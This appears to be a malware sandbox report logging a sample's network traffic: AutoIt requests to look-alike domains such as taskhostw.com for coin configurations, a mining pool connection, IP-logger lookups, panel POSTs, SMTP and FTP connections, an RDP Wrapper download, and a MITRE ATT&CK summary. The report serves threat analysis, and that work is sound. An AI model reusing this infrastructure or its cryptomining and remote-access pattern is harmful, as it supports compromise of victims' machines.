Date: Wed, 18 Nov 2020 14:45:07 GMT
X-Served-By: cache-ams21059-AMS
X-Cache: HIT, HIT
X-Cache-Hits: 3, 1
X-Timer: S1605710707.424519,VS0,VE1
Vary: Authorization,Accept-Encoding, Accept-Encoding
Access-Control-Allow-Origin: *
X-Fastly-Request-ID: 63fdce17a3f1ed51a667ffd265a451f2b51bca6d
Expires: Wed, 18 Nov 2020 14:50:07 GMT
Source-Age: 173
-
GEThttp://taskhostw.com/randomx/configCPUX.htmlRemote address:152.89.218.85:80RequestGET /randomx/configCPUX.html HTTP/1.1
User-Agent: AutoIt
Host: taskhostw.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 14:45:22 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Fri, 13 Nov 2020 15:14:55 GMT
ETag: "6f-5b3fe7db529dd"
Accept-Ranges: bytes
Content-Length: 111
Vary: Accept-Encoding
Content-Type: text/html
-
GEThttp://taskhostw.com/LTC.htmlRemote address:152.89.218.85:80RequestGET /LTC.html HTTP/1.1
User-Agent: AutoIt
Host: taskhostw.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 14:46:22 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Fri, 24 Jul 2020 04:15:02 GMT
ETag: "22-5ab28378c66fa"
Accept-Ranges: bytes
Content-Length: 34
Content-Type: text/html
-
GEThttp://taskhostw.com/BTC.htmlRemote address:152.89.218.85:80RequestGET /BTC.html HTTP/1.1
User-Agent: AutoIt
Host: taskhostw.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 14:46:23 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Fri, 24 Jul 2020 04:15:02 GMT
ETag: "22-5ab283785b044"
Accept-Ranges: bytes
Content-Length: 34
Content-Type: text/html
-
GEThttp://taskhostw.com/ETH.htmlRemote address:152.89.218.85:80RequestGET /ETH.html HTTP/1.1
User-Agent: AutoIt
Host: taskhostw.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 14:46:24 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Fri, 24 Jul 2020 04:15:02 GMT
ETag: "2a-5ab2837892adf"
Accept-Ranges: bytes
Content-Length: 42
Content-Type: text/html
-
GEThttp://taskhostw.com/ZEC.htmlRemote address:152.89.218.85:80RequestGET /ZEC.html HTTP/1.1
User-Agent: AutoIt
Host: taskhostw.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 14:46:25 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Fri, 24 Jul 2020 04:15:02 GMT
ETag: "23-5ab28378f9376"
Accept-Ranges: bytes
Content-Length: 35
Content-Type: text/html
-
GEThttp://taskhostw.com/DOGE.htmlRemote address:152.89.218.85:80RequestGET /DOGE.html HTTP/1.1
User-Agent: AutoIt
Host: taskhostw.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 14:46:26 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Fri, 24 Jul 2020 04:15:02 GMT
ETag: "22-5ab28378811a0"
Accept-Ranges: bytes
Content-Length: 34
Content-Type: text/html
-
DNSfontdrvhost.ruRemote address:8.8.8.8:53Requestfontdrvhost.ruIN AResponsefontdrvhost.ruIN A193.32.188.144
-
DNSdashost2.xyzRemote address:8.8.8.8:53Requestdashost2.xyzIN AResponsedashost2.xyzIN A194.147.78.109
-
GEThttp://dashost2.xyz/randomx/STATUS.htmlRemote address:194.147.78.109:80RequestGET /randomx/STATUS.html HTTP/1.1
User-Agent: AutoIt
Host: dashost2.xyz
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 14:46:33 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Fri, 13 Nov 2020 15:15:41 GMT
ETag: "6-5b3fe806f1e18"
Accept-Ranges: bytes
Content-Length: 6
Content-Type: text/html
-
GEThttp://dashost2.xyz/LTC.htmlRemote address:194.147.78.109:80RequestGET /LTC.html HTTP/1.1
User-Agent: AutoIt
Host: dashost2.xyz
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 14:46:34 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Tue, 22 Sep 2020 20:21:28 GMT
ETag: "22-5afecb6476e6e"
Accept-Ranges: bytes
Content-Length: 34
Content-Type: text/html
-
GEThttp://dashost2.xyz/BTC.htmlRemote address:194.147.78.109:80RequestGET /BTC.html HTTP/1.1
User-Agent: AutoIt
Host: dashost2.xyz
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 14:46:35 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Tue, 22 Sep 2020 20:21:28 GMT
ETag: "22-5afecb63de8e4"
Accept-Ranges: bytes
Content-Length: 34
Content-Type: text/html
-
GEThttp://dashost2.xyz/ETH.htmlRemote address:194.147.78.109:80RequestGET /ETH.html HTTP/1.1
User-Agent: AutoIt
Host: dashost2.xyz
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 14:46:36 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Tue, 22 Sep 2020 20:21:28 GMT
ETag: "2a-5afecb64328aa"
Accept-Ranges: bytes
Content-Length: 42
Content-Type: text/html
-
GEThttp://dashost2.xyz/ZEC.htmlRemote address:194.147.78.109:80RequestGET /ZEC.html HTTP/1.1
User-Agent: AutoIt
Host: dashost2.xyz
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 14:46:37 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Tue, 22 Sep 2020 20:21:29 GMT
ETag: "23-5afecb64a8b51"
Accept-Ranges: bytes
Content-Length: 35
Content-Type: text/html
-
GEThttp://dashost2.xyz/DOGE.htmlRemote address:194.147.78.109:80RequestGET /DOGE.html HTTP/1.1
User-Agent: AutoIt
Host: dashost2.xyz
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 14:46:38 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Tue, 22 Sep 2020 20:21:28 GMT
ETag: "22-5afecb6419268"
Accept-Ranges: bytes
Content-Length: 34
Content-Type: text/html
-
DNSwininit.clubRemote address:8.8.8.8:53Requestwininit.clubIN AResponsewininit.clubIN A109.248.11.138
-
GEThttp://wininit.club/d/web.htmlRemote address:109.248.11.138:80RequestGET /d/web.html HTTP/1.1
User-Agent: AutoIt
Host: wininit.club
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Wed, 18 Nov 2020 14:46:33 GMT
Server: Apache/2.4.25 (Debian)
Last-Modified: Tue, 13 Oct 2020 21:00:53 GMT
ETag: "e-5b193b5dea71b"
Accept-Ranges: bytes
Content-Length: 14
Content-Type: text/html
-
208.95.112.1:80http://ip-api.com/jsonhttp
HTTP Request
GET http://ip-api.com/jsonHTTP Response
200 -
185.143.145.9:80http://stcubegames.netxi.in/index.phphttp
HTTP Request
POST http://stcubegames.netxi.in/index.phpHTTP Response
200HTTP Request
POST http://stcubegames.netxi.in/index.phpHTTP Response
200 -
185.175.44.167:5655rms-server.tektonit.ru
-
208.95.112.1:80http://ip-api.com/jsonhttp
HTTP Request
GET http://ip-api.com/jsonHTTP Response
200 -
194.0.200.251:465freemail.freehost.com.uatls, smtps
-
88.99.66.31:443https://iplogger.org/1kcM87tls, http
HTTP Request
GET https://iplogger.org/1kcM87HTTP Response
200 -
152.89.218.85:80http://taskhostw.com/randomx/Server.htmlhttp
HTTP Request
GET http://taskhostw.com/randomx/STATUS.htmlHTTP Response
200HTTP Request
GET http://taskhostw.com/randomx/loaderTOP.htmlHTTP Response
404HTTP Request
GET http://taskhostw.com/randomx/Login.htmlHTTP Response
200HTTP Request
GET http://taskhostw.com/randomx/Password.htmlHTTP Response
200HTTP Request
GET http://taskhostw.com/randomx/Server.htmlHTTP Response
200 -
151.101.0.133:443https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.initls, http
HTTP Request
GET https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniHTTP Response
200 -
109.248.203.81:21ftp
-
151.101.0.133:443https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.initls, http
HTTP Request
GET https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniHTTP Response
200 -
152.89.218.85:80http://taskhostw.com/randomx/configCPUX.htmlhttp
HTTP Request
GET http://taskhostw.com/randomx/configCPUX.htmlHTTP Response
200 -
109.248.203.81:21ftp
-
109.248.203.81:54446
-
109.248.203.81:62638
-
109.248.203.81:21ftp
-
109.248.203.81:51495
-
109.248.203.81:21ftp
-
109.248.203.81:54368
-
152.89.218.85:80http://taskhostw.com/DOGE.htmlhttp
HTTP Request
GET http://taskhostw.com/LTC.htmlHTTP Response
200HTTP Request
GET http://taskhostw.com/BTC.htmlHTTP Response
200HTTP Request
GET http://taskhostw.com/ETH.htmlHTTP Response
200HTTP Request
GET http://taskhostw.com/ZEC.htmlHTTP Response
200HTTP Request
GET http://taskhostw.com/DOGE.htmlHTTP Response
200 -
193.32.188.144:3333fontdrvhost.ru
-
194.147.78.109:80http://dashost2.xyz/DOGE.htmlhttp
HTTP Request
GET http://dashost2.xyz/randomx/STATUS.htmlHTTP Response
200HTTP Request
GET http://dashost2.xyz/LTC.htmlHTTP Response
200HTTP Request
GET http://dashost2.xyz/BTC.htmlHTTP Response
200HTTP Request
GET http://dashost2.xyz/ETH.htmlHTTP Response
200HTTP Request
GET http://dashost2.xyz/ZEC.htmlHTTP Response
200HTTP Request
GET http://dashost2.xyz/DOGE.htmlHTTP Response
200 -
109.248.11.138:80http://wininit.club/d/web.htmlhttp
HTTP Request
GET http://wininit.club/d/web.htmlHTTP Response
200
-
8.8.8.8:53ip-api.comdns
DNS Request
ip-api.com
DNS Response
208.95.112.1
-
8.8.8.8:53stcubegames.netxi.indns
DNS Request
stcubegames.netxi.in
DNS Response
185.143.145.9
-
8.8.8.8:53rms-server.tektonit.rudns
DNS Request
rms-server.tektonit.ru
DNS Response
185.175.44.167
-
8.8.8.8:53freemail.freehost.com.uadns
DNS Request
freemail.freehost.com.ua
DNS Response
194.0.200.251
-
8.8.8.8:53iplogger.orgdns
DNS Request
iplogger.org
DNS Response
88.99.66.31
-
8.8.8.8:53taskhostw.comdns
DNS Request
taskhostw.com
DNS Response
152.89.218.85
-
8.8.8.8:53raw.githubusercontent.comdns
DNS Request
raw.githubusercontent.com
DNS Response
151.101.0.133151.101.64.133151.101.128.133151.101.192.133
-
8.8.8.8:53fontdrvhost.rudns
DNS Request
fontdrvhost.ru
DNS Response
193.32.188.144
-
8.8.8.8:53dashost2.xyzdns
DNS Request
dashost2.xyz
DNS Response
194.147.78.109
-
8.8.8.8:53wininit.clubdns
DNS Request
wininit.club
DNS Response
109.248.11.138
MITRE ATT&CK Enterprise v6
Persistence
Account Manipulation
1Hidden Files and Directories
3Modify Existing Service
3Registry Run Keys / Startup Folder
3Winlogon Helper DLL
1Defense Evasion
Bypass User Account Control
1Disabling Security Tools
3File and Directory Permissions Modification
1Hidden Files and Directories
3Impair Defenses
1Modify Registry
9Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB